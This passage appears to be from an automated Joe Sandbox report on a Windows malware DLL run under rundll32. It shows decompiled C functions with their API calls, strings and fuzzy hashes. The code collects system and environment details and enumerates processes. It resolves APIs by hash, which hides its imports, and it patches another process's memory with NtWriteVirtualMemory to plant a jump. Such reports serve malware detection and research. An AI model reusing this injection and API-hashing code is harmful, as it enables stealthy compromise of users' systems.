				intOrPtr _t151;
				void* _t152;
				WCHAR* _t153;
				char* _t154;
				intOrPtr _t165;
				intOrPtr _t180;
				void* _t196;
				struct _OSVERSIONINFOA* _t197;
				void* _t198;
				void* _t200;
				char _t203;
				void* _t204;
				char* _t205;
				void* _t208;
				int* _t209;
				void* _t222;

				_t222 = __fp0;
				_t151 =  *0x10020d60; // 0x10000000
				_t69 = E10009525(0x1ac4);
				_t197 = _t69;
				if(_t197 != 0) {
					 *((intOrPtr*)(_t197 + 0x1640)) = GetCurrentProcessId();
					_t71 =  *0x10020d58; // 0x4a5f900
					_t72 =  *((intOrPtr*)(_t71 + 0xb0))(_t198);
					_t3 = _t197 + 0x648; // 0x648
					E100151C2( *((intOrPtr*)(_t197 + 0x1640)) + _t72, _t3);
					_t74 =  *0x10020d58; // 0x4a5f900
					_t5 = _t197 + 0x1644; // 0x1644
					_t199 = _t5;
					_t75 =  *((intOrPtr*)(_t74 + 0x12c))(0, _t5, 0x105);
					_t212 = _t75;
					if(_t75 != 0) {
						 *((intOrPtr*)(_t197 + 0x1854)) = E10009961(_t199, _t212);
					}
					_t76 =  *0x10020d58; // 0x4a5f900
					_t78 = E1000E500( *((intOrPtr*)(_t76 + 0x130))()); // executed
					 *((intOrPtr*)(_t197 + 0x110)) = _t78;
					_t162 =  *_t78;
					if(E1000E67B( *_t78) == 0) {
						_t80 = E1000E550(_t162, _t199); // executed
						__eflags = _t80;
						_t165 = (0 | _t80 > 0x00000000) + 1;
						__eflags = _t165;
						 *((intOrPtr*)(_t197 + 0x214)) = _t165;
					} else {
						 *((intOrPtr*)(_t197 + 0x214)) = 3;
					}
					_t14 = _t197 + 0x220; // 0x220, executed
					_t81 = E1000EE8D(_t14); // executed
					 *((intOrPtr*)(_t197 + 0x218)) = _t81;
					_t82 = E1000EE52(_t14); // executed
					 *((intOrPtr*)(_t197 + 0x21c)) = _t82;
					_t17 = _t197 + 0x114; // 0x114
					_t200 = _t17;
					 *((intOrPtr*)(_t197 + 0x224)) = _t151;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t200);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x110)))));
					_t88 =  *0x10020d78; // 0x4a5fb48
					_push(0); // executed
					if( *((intOrPtr*)(_t88 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 =  *0x10020d50; // 0x4a5fa80
					_t91 =  *((intOrPtr*)(_t90 + 0x3c))(0x1000);
					_t28 = _t197 + 0x228; // 0x228
					_t152 = _t28;
					 *(_t197 + 0x1850) = 0 | _t91 > 0x00000000;
					if( *0x10020d5c != 2) {
						E1000B18D(_t152);
					} else {
						E1000B194(_t152);
					}
					_t93 =  *0x10020d5c; // 0x1
					 *((intOrPtr*)(_t197 + 0xa0)) = _t93;
					_t217 = _t152;
					if(_t152 != 0) {
						 *((intOrPtr*)(_t197 + 0x434)) = E10009961(_t152, _t217);
					}
					_t94 = E1000D7B0();
					_t34 = _t197 + 0xb0; // 0xb0
					_t201 = _t34;
					 *((intOrPtr*)(_t197 + 0xac)) = _t94;
					_t95 = E1000D5A6(_t94, _t34, _t217, _t222);
					_t36 = _t197 + 0xd0; // 0xd0
					E10009D4D(_t95, _t34, _t36);
					_t37 = _t197 + 0x438; // 0x438
					E1000997B(_t152, _t37);
					_t99 = E1000EEEC(_t201, E1000D389(_t34), 0);
					_t38 = _t197 + 0x100c; // 0x100c
					E1000D7C6(_t99, _t38, _t222);
					_t101 =  *0x10020d58; // 0x4a5f900
					_t103 = E1000E6CD( *((intOrPtr*)(_t101 + 0x130))(_t200)); // executed
					 *((intOrPtr*)(_t197 + 0x101c)) = _t103;
					E100096BF(_t197, 0, 0x9c);
					_t209 = _t208 + 0xc;
					_t197->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t197);
					 *((intOrPtr*)(_t197 + 0xa8)) = E1000AF90(_t102);
					_t108 = E1000AFB9(_t107);
					_t42 = _t197 + 0x1020; // 0x1020
					_t153 = _t42;
					 *((short*)(_t197 + 0x9c)) = _t108;
					GetWindowsDirectoryW(_t153, 0x104);
					_t110 = E1000948D(_t107, 0x11cb);
					_t180 =  *0x10020d58; // 0x4a5f900
					_t203 = _t110;
					 *_t209 = 0x104;
					_push( &_v668);
					_push(_t203);
					_v8 = _t203;
					if( *((intOrPtr*)(_t180 + 0xf0))() == 0) {
						_t145 =  *0x10020d58; // 0x4a5f900
						 *((intOrPtr*)(_t145 + 0x10c))(_t203, _t153);
					}
					E1000A291( &_v8);
					_t115 =  *0x10020d58; // 0x4a5f900
					_t49 = _t197 + 0x1434; // 0x1434
					_t204 = _t49;
					 *_t209 = 0x209;
					_push(_t204);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t115 + 0xf0))() == 0) {
						E1000B76A(_t204, 0x105, L"%s\\%s", _t153);
						_t143 =  *0x10020d58; // 0x4a5f900
						_t209 =  &(_t209[5]);
						 *((intOrPtr*)(_t143 + 0x10c))(L"USERPROFILE", _t204, "TEMP");
					}
					_push(0x20a);
					_t52 = _t197 + 0x122a; // 0x122a
					_t154 = L"TEMP";
					_t118 =  *0x10020d58; // 0x4a5f900
					_push(_t154);
					if( *((intOrPtr*)(_t118 + 0xf0))() == 0) {
						_t140 =  *0x10020d58; // 0x4a5f900
						 *((intOrPtr*)(_t140 + 0x10c))(_t154, _t204);
					}
					_push(0x40);
					_t205 = L"SystemDrive";
					_push( &_v144);
					_t121 =  *0x10020d58; // 0x4a5f900
					_push(_t205);
					if( *((intOrPtr*)(_t121 + 0xf0))() == 0) {
						_t138 =  *0x10020d58; // 0x4a5f900
						 *((intOrPtr*)(_t138 + 0x10c))(_t205, L"C:");
					}
					_v8 = 0x7f;
					_t60 = _t197 + 0x199c; // 0x199c
					_t125 =  *0x10020d58; // 0x4a5f900
					 *((intOrPtr*)(_t125 + 0xc0))(_t60,  &_v8);
					_t63 = _t197 + 0x100c; // 0x100c
					E100151C2(E1000EEEC(_t63, E1000D389(_t63), 0),  &_v2644);
					_t64 = _t197 + 0x1858; // 0x1858
					E10015194( &_v2644, _t64, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t67 = _t197 + 0x1878; // 0x1878
					_t196 = 0x14;
					E10009A48(_t67, _t196);
					_t136 = E1000AC45(_t196); // executed
					 *((intOrPtr*)(_t197 + 0x1898)) = _t136;
					return _t197;
				}
				return _t69;
			}

0x1000b231
0x1000b23b
0x1000b247
0x1000b24c
0x1000b251
0x1000b25e
0x1000b264
0x1000b269
0x1000b26f
0x1000b27f
0x1000b284
0x1000b289
0x1000b289
0x1000b299
0x1000b29f
0x1000b2a1
0x1000b2aa
0x1000b2aa
0x1000b2b0
0x1000b2bd
0x1000b2c2
0x1000b2c8
0x1000b2d1
0x1000b2df
0x1000b2e6
0x1000b2eb
0x1000b2eb
0x1000b2ec
0x1000b2d3
0x1000b2d3
0x1000b2d3
0x1000b2f2
0x1000b2f8
0x1000b2fd
0x1000b303
0x1000b308
0x1000b30e
0x1000b30e
0x1000b317
0x1000b31d
0x1000b321
0x1000b328
0x1000b32f
0x1000b336
0x1000b33a
0x1000b341
0x1000b342
0x1000b344
0x1000b349
0x1000b350
0x1000b352
0x1000b352
0x1000b358
0x1000b362
0x1000b367
0x1000b367
0x1000b379
0x1000b37f
0x1000b38c
0x1000b381
0x1000b383
0x1000b383
0x1000b391
0x1000b396
0x1000b39c
0x1000b39e
0x1000b3a7
0x1000b3a7
0x1000b3af
0x1000b3b4
0x1000b3b4
0x1000b3ba
0x1000b3c5
0x1000b3ca
0x1000b3d2
0x1000b3d8
0x1000b3e0
0x1000b3f2
0x1000b3f8
0x1000b400
0x1000b405
0x1000b412
0x1000b423
0x1000b429
0x1000b42e
0x1000b431
0x1000b434
0x1000b441
0x1000b447
0x1000b451
0x1000b451
0x1000b457
0x1000b45f
0x1000b46a
0x1000b46f
0x1000b475
0x1000b477
0x1000b484
0x1000b485
0x1000b486
0x1000b491
0x1000b493
0x1000b49a
0x1000b49a
0x1000b4a4
0x1000b4a9
0x1000b4ae
0x1000b4ae
0x1000b4b4
0x1000b4bb
0x1000b4bc
0x1000b4c9
0x1000b4dc
0x1000b4e1
0x1000b4e6
0x1000b4ef
0x1000b4ef
0x1000b4f5
0x1000b4fa
0x1000b500
0x1000b506
0x1000b50b
0x1000b514
0x1000b516
0x1000b51d
0x1000b51d
0x1000b523
0x1000b52b
0x1000b530
0x1000b531
0x1000b536
0x1000b53f
0x1000b541
0x1000b54c
0x1000b54c
0x1000b555
0x1000b55d
0x1000b564
0x1000b569
0x1000b578
0x1000b590
0x1000b597
0x1000b5a5
0x1000b5b0
0x1000b5b1
0x1000b5b5
0x1000b5bb
0x1000b5bc
0x1000b5c4
0x1000b5c9
0x00000000
0x1000b5d1
0x1000b5d5

APIs

Part of subcall function 10009525: RtlAllocateHeap.E77242D6(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

GetCurrentProcessId.KERNEL32(?,?,00000001), ref: 1000B258
GetLastError.KERNEL32(?,?,00000001), ref: 1000B352
GetVersionExA.KERNEL32(00000000,?,?,00000001), ref: 1000B434

Part of subcall function 1000E550: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000E5F4

GetWindowsDirectoryW.KERNEL32(00001020,00000104,?,?,00000001), ref: 1000B45F

Strings

USERPROFILE, xrefs: 1000B4BC, 1000B4EA
%s\%s, xrefs: 1000B4D1
TEMP, xrefs: 1000B4CB
TEMP, xrefs: 1000B500, 1000B50B, 1000B51C
SystemDrive, xrefs: 1000B52B, 1000B536, 1000B54B

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastNotificationProcessVersionWindows
String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
API String ID: 1354322220-2706916422
Opcode ID: c3f59ee73e5be98a47a9f9a7ffb566f7efe146b61a4d604da622eee37d8853a8
Instruction ID: 9ecf3e02f1acfa31b532110abafa1360833cb570ef2274f9fa1bd2246b0adb1a
Opcode Fuzzy Hash: c3f59ee73e5be98a47a9f9a7ffb566f7efe146b61a4d604da622eee37d8853a8
Instruction Fuzzy Hash: FAA18E35701A16AFE704EFB4CC89BEAB7A9FF48340F100169F519D7252EB30BA458B91

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA02 Relevance: 6.1, APIs: 4, Instructions: 118
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E1000AA02(intOrPtr __ecx, void** __edx, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				intOrPtr _v15;
				void _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				long _v32;
				void* _v572;
				char _v748;
				signed char _t39;
				intOrPtr _t40;
				void* _t41;
				void* _t43;
				intOrPtr _t47;
				void _t51;
				intOrPtr _t68;
				void** _t69;
				void* _t72;
				intOrPtr _t74;
				long _t78;
				void* _t80;

				_t70 = __ecx;
				_t69 = __edx;
				_v28 = __ecx;
				_t74 =  *0x10020d88; // 0x4a5fc98
				_t80 = 0;
				_t2 = _t74 + 0x1898; // 0x4
				_t39 =  *_t2;
				if(_t39 == 0x200 || _t39 == 0x80 || _t39 == 2 ||  *((intOrPtr*)(_t74 + 4)) >= 0xa && (_t39 & 0x00000004) != 0) {
					_t40 = E1000A2BD(_t70, _t74); // executed
					 *0x10020e70 = _t40;
				} else {
					_t40 =  *0x10020e70; // 0x4a61868
				}
				if(_t40 != 0) {
					_t41 = E1000A4A8( *_t69, _a4); // executed
					_t80 = _t41;
					if(_t80 == 0) {
						goto L9;
					} else {
						E100096BF( &_v748, 0, 0x2cc);
						_v748 = 0x10002;
						_push( &_v748);
						_t47 =  *0x10020d58; // 0x4a5f900
						_push(_t69[1]);
						if( *((intOrPtr*)(_t47 + 0xb8))() == 0) {
							goto L9;
						} else {
							_v20 = _v20 & 0x00000000;
							_t51 = _t80 - _a4 + _v28;
							_t72 = _v572;
							_t78 = 5;
							if(_a8 != 1) {
								if(_a8 != 2) {
									_t43 = 0;
								} else {
									_v16 = _t51;
									_t78 = 4;
									goto L17;
								}
							} else {
								_v16 = 0xe9;
								_v15 = _t51 - _t72 - _t78;
								L17:
								_v8 = _t78;
								_v24 = _t72;
								if(NtProtectVirtualMemory( *_t69,  &_v24,  &_v8, 4,  &_v20) >= 0) {
									if(NtWriteVirtualMemory( *_t69, _v572,  &_v16, _t78,  &_v8) < 0) {
										goto L18;
									} else {
										_v32 = _v32 & 0x00000000;
										if(NtProtectVirtualMemory( *_t69,  &_v24,  &_v8, _v20,  &_v32) >= 0) {
											goto L9;
										} else {
											goto L18;
										}
									}
								} else {
									L18:
									_t80 = 0;
									goto L9;
								}
								L23:
							}
						}
					}
				} else {
					_t68 =  *0x10020d94; // 0x4a5fa48
					 *0x10020e70 = _t68;
					L9:
					E1000A3EC();
					_t43 = _t80;
				}
				return _t43;
				goto L23;
			}

0x1000aa02
0x1000aa0c
0x1000aa0e
0x1000aa11
0x1000aa18
0x1000aa1b
0x1000aa1b
0x1000aa26
0x1000aa45
0x1000aa4a
0x1000aa3e
0x1000aa3e
0x1000aa3e
0x1000aa51
0x1000aa6e
0x1000aa73
0x1000aa77
0x00000000
0x1000aa79
0x1000aa87
0x1000aa8f
0x1000aa9f
0x1000aaa0
0x1000aaa5
0x1000aab0
0x00000000
0x1000aab2
0x1000aab2
0x1000aabb
0x1000aac2
0x1000aaca
0x1000aacb
0x1000aade
0x1000ab53
0x1000aae0
0x1000aae2
0x1000aae5
0x00000000
0x1000aae5
0x1000aacd
0x1000aacf
0x1000aad5
0x1000aae6
0x1000aae9
0x1000aaf2
0x1000ab06
0x1000ab2a
0x00000000
0x1000ab2c
0x1000ab2c
0x1000ab4b
0x00000000
0x1000ab51
0x00000000
0x1000ab51
0x1000ab4b
0x1000ab08
0x1000ab08
0x1000ab08
0x00000000
0x1000ab08
0x00000000
0x1000ab06
0x1000aacb
0x1000aab0
0x1000aa53
0x1000aa53
0x1000aa58
0x1000aa5d
0x1000aa5d
0x1000aa62
0x1000aa62
0x1000aa68
0x00000000

APIs

Wow64GetThreadContext.KERNEL32(?,00010002,?,00000000,00000001), ref: 1000AAA8
NtProtectVirtualMemory.E77242D6(?,?,00000001,00000004,00000000,?,00000000,00000001), ref: 1000AB01
NtWriteVirtualMemory.E77242D6(?,?,00000002,00000004,00000001,?,00000000,00000001), ref: 1000AB25
NtProtectVirtualMemory.E77242D6(?,?,00000001,00000000,00000000,?,00000000,00000001), ref: 1000AB46

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: MemoryVirtual$Protect$ContextThreadWow64Write
String ID:
API String ID: 1811831458-0
Opcode ID: e7f6d40e21079af8cd1ea1dee90f303181879499d9c5e0249dd15e369b9b0682
Instruction ID: 8bc5829f845a12ea8b60137831a6806cc275a37a637710cc3731e64fdec36fb8
Opcode Fuzzy Hash: e7f6d40e21079af8cd1ea1dee90f303181879499d9c5e0249dd15e369b9b0682
Instruction Fuzzy Hash: 2441AC71A00219EFEB50CFA8C988A9EB7FAFF4A380F104265F505E61A5D770DA85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000CD1E Relevance: 6.1, APIs: 4, Instructions: 66
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E1000CD1E(void* __ecx, void* __edx) {
				void* _v304;
				void* _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E100096BF( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						do {
							_t43 = _v312( &_v308, _t33);
						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x10020d58; // 0x4a5f900
						 *((intOrPtr*)(_t30 + 0x34))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}

0x1000cd36
0x1000cd38
0x1000cd3c
0x1000cd3f
0x1000cd41
0x1000cd46
0x1000cd55
0x1000cd5d
0x1000cd71
0x1000cd81
0x1000cd8b
0x1000cd8f
0x1000cdac
0x1000cdb3
0x1000cd73
0x1000cd73
0x1000cd79
0x1000cd7e
0x1000cd7e
0x1000cd71
0x1000cdbc

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000019,?,00000018), ref: 1000CD3C

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

Process32First.KERNEL32(00000000,?), ref: 1000CD6C
Process32Next.KERNEL32(00000000,?), ref: 1000CD9F
FindCloseChangeNotification.KERNELBASE(00000000), ref: 1000CDAC

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 2518216231-0
Opcode ID: 996dcc371edf8a3de5ade8aca68dc2e00b0d215e3b0d06ae6d94bc47d4b545c2
Instruction ID: e0ff1e4e8235e93eda23a65ce13b7923652eca031fd4941afaeddc76423dec26
Opcode Fuzzy Hash: 996dcc371edf8a3de5ade8aca68dc2e00b0d215e3b0d06ae6d94bc47d4b545c2
Instruction Fuzzy Hash: 5911C4736053559BE350DFA8DC48E9B7BECEFC53A0F15062AF910C71A1EB20E90687A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000970D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000970D(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E1000EEEC( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000D389( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x10009716
0x10009718
0x1000971b
0x1000971e
0x10009724
0x10009781
0x00000000
0x10009781
0x10009726
0x10009731
0x10009734
0x10009739
0x1000973e
0x10009741
0x10009743
0x10009746
0x10009749
0x1000974e
0x00000000
0x00000000
0x00000000
0x00000000
0x10009750
0x10009750
0x10009762
0x1000976f
0x10009773
0x00000000
0x00000000
0x10009775
0x10009778
0x10009779
0x1000977f
0x00000000
0x00000000
0x00000000
0x1000977f
0x10009796
0x1000979b
0x1000979f
0x00000000
0x100097ab
0x100097ab
0x100097ad
0x100097ad
0x100097b3
0x00000000
0x00000000
0x100097b9
0x100097bd
0x100097c1
0x00000000
0x00000000
0x00000000
0x100097c1
0x100097c7
0x100097cf
0x100097d4
0x100097d7
0x100097d7
0x100097d9
0x100097dd
0x100097e5
0x00000000
0x00000000
0x100097e9
0x100097f1
0x00000000
0x00000000
0x00000000
0x100097f1

APIs

LoadLibraryA.KERNELBASE(.dll,?,00000140,00000000), ref: 100097DD
GetProcAddress.KERNEL32(00000000,?), ref: 100097E9

Strings

.dll, xrefs: 100097D9, 100097DC

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll
API String ID: 2574300362-2738580789
Opcode ID: 53a7b4d00723407f0d789300976f2dd1b806011e9297163532ce598cbbef6b78
Instruction ID: d776720c0b4c11bf6a46d7560ebcee6aca48920ffc03f030aee782babc1786af
Opcode Fuzzy Hash: 53a7b4d00723407f0d789300976f2dd1b806011e9297163532ce598cbbef6b78
Instruction Fuzzy Hash: 2831E136E182559BEB54CFADC884AAEBBF5EF44384F244469D809E7249DB30DD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000169F Relevance: 4.6, APIs: 3, Instructions: 95
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E1000169F(WCHAR* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v20;
				void* __ecx;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t25;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t33;
				intOrPtr _t36;
				intOrPtr _t46;
				void* _t50;
				char _t53;

				_t58 = __fp0;
				_t48 = __edx;
				E1000188E();
				GetLocaleInfoA(1, 2,  &_v20, 4); // executed
				_t18 = E1000B231(_t48, __fp0); // executed
				 *0x10020d88 = _t18;
				if(_t18 != 0) {
					E10014C5F( *((intOrPtr*)(_t18 + 0x224)));
					_t20 =  *0x10020d88; // 0x4a5fc98
					_pop(_t43);
					__eflags =  *((intOrPtr*)(_t20 + 0x101c)) - 1;
					if( *((intOrPtr*)(_t20 + 0x101c)) != 1) {
						L7:
						__eflags =  *(_t20 + 0x1898) & 0x00010082;
						if(( *(_t20 + 0x1898) & 0x00010082) != 0) {
							L11:
							 *((intOrPtr*)(_t20 + 0xa4)) = 1;
							_t21 =  *0x10020d88; // 0x4a5fc98
							__eflags =  *((intOrPtr*)(_t21 + 0x214)) - 3;
							if(__eflags == 0) {
								L10:
								E10002E87();
								L13:
								__eflags = 0;
								return 0;
							}
							E100014FA(_t48, __eflags, _t58);
							goto L13;
						}
						_t11 = _t20 + 0x224; // 0x10000000
						_t48 =  *_t11;
						_t25 = E1000A843( *_t11); // executed
						__eflags = _t25;
						_t20 =  *0x10020d88; // 0x4a5fc98
						if(_t25 == 0) {
							goto L11;
						}
						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
						if( *((intOrPtr*)(_t20 + 0x214)) != 3) {
							goto L13;
						}
						goto L10;
					}
					__imp__CoInitializeEx(0, 6, __edi, __esi);
					_t26 =  *0x10020d88; // 0x4a5fc98
					_push(0);
					_push(0x1001db00);
					_t27 = _t26 + 0x228;
					__eflags = _t27;
					_push(_t27);
					_t50 = E10009DC8(0x1001db00);
					_t53 = E100019A6(0x1001db00, 0x420);
					_v8 = _t53;
					while(1) {
						_t46 =  *0x10020d88; // 0x4a5fc98
						_t30 =  *0x10020d50; // 0x4a5fa80
						_t32 =  *0x10020d6c; // 0x4a5fc60
						_t33 =  *_t32( *((intOrPtr*)(_t30 + 0x54))(_t53, _t46 + 0x1644, _t50, 0, 0));
						__eflags = _t33 - 5;
						if(_t33 != 5) {
							break;
						}
						Sleep(0x7d0);
					}
					E1000A291( &_v8);
					_t36 =  *0x10020d58; // 0x4a5f900
					_pop(_t43);
					 *((intOrPtr*)(_t36 + 0xec))(0);
					_t20 =  *0x10020d88; // 0x4a5fc98
					goto L7;
				}
				return 1;
			}

0x1000169f
0x1000169f
0x100016a6
0x100016b7
0x100016be
0x100016c3
0x100016cb
0x100016da
0x100016df
0x100016e4
0x100016e5
0x100016eb
0x1000177d
0x1000177d
0x10001787
0x100017af
0x100017af
0x100017b5
0x100017ba
0x100017c1
0x100017a8
0x100017a8
0x100017c8
0x100017c8
0x00000000
0x100017c8
0x100017c3
0x00000000
0x100017c3
0x10001789
0x10001789
0x10001790
0x10001795
0x10001797
0x1000179d
0x00000000
0x00000000
0x1000179f
0x100017a6
0x00000000
0x00000000
0x00000000
0x100017a6
0x100016f7
0x100016fd
0x10001707
0x10001709
0x1000170a
0x1000170a
0x1000170f
0x1000171b
0x10001722
0x10001727
0x1000172a
0x1000172a
0x10001730
0x10001746
0x1000174b
0x1000174d
0x10001750
0x00000000
0x00000000
0x10001757
0x10001757
0x10001763
0x10001768
0x1000176d
0x10001770
0x10001776
0x00000000
0x1000177c
0x00000000

APIs

GetLocaleInfoA.KERNELBASE(00000001,00000002,?,00000004), ref: 100016B7

Part of subcall function 1000B231: GetCurrentProcessId.KERNEL32(?,?,00000001), ref: 1000B258
Part of subcall function 1000B231: GetLastError.KERNEL32(?,?,00000001), ref: 1000B352

CoInitializeEx.OLE32(00000000,00000006), ref: 100016F7
Sleep.KERNEL32(000007D0), ref: 10001757

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentErrorInfoInitializeLastLocaleProcessSleep
String ID:
API String ID: 1553610659-0
